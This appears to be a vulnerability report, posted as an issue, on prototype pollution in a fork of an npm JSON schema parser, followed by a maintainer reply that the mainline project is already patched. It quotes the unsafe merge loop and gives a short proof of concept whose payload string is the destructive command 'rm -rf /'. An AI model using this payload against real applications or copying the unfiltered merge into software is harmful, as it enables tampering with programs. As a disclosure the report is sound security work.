Prototype Pollution in @bcherny/json-schema-ref-parser

[dfzysmy2tf-create]

Basic Information

Package Name: @bcherny/json-schema-ref-parser
Package URL: https://www.npmjs.com/package/@bcherny/json-schema-ref-parser
Report URL: home_chluo_Argus-0205_Argus-main_npm_packages_@bcherny__json-schema-ref-parser_pollution_report.md
Vulnerable Code Location: lib/util/merge.js → merge function

Vulnerability Details

Vulnerability Type: Prototype Pollution
Root Cause
The JSON Schema merge function merge does not filter prototype chain properties, which can trigger global prototype pollution when parsing malicious external JSON.
Problem Code Location
File: lib/util/merge.js
Function: merge

Vulnerable Code Snippet

function merge(target, ...sources) {
  for (let source of sources) {
    for (let key in source) {
      target[key] = source[key]; // Core Vulnerable Line
    }
  }
}

POC (Reproducible Directly)

const parser = require('@bcherny/json-schema-ref-parser');
const maliciousSchema = {"__proto__":{"exec":"rm -rf /"}};
parser.dereference(maliciousSchema);
console.log({}.exec); // Output: rm -rf /

[jonluca]

The link you published is a fork of this project. This project already has mitigations in place in mainline. Please contact @bcherny to update his fork.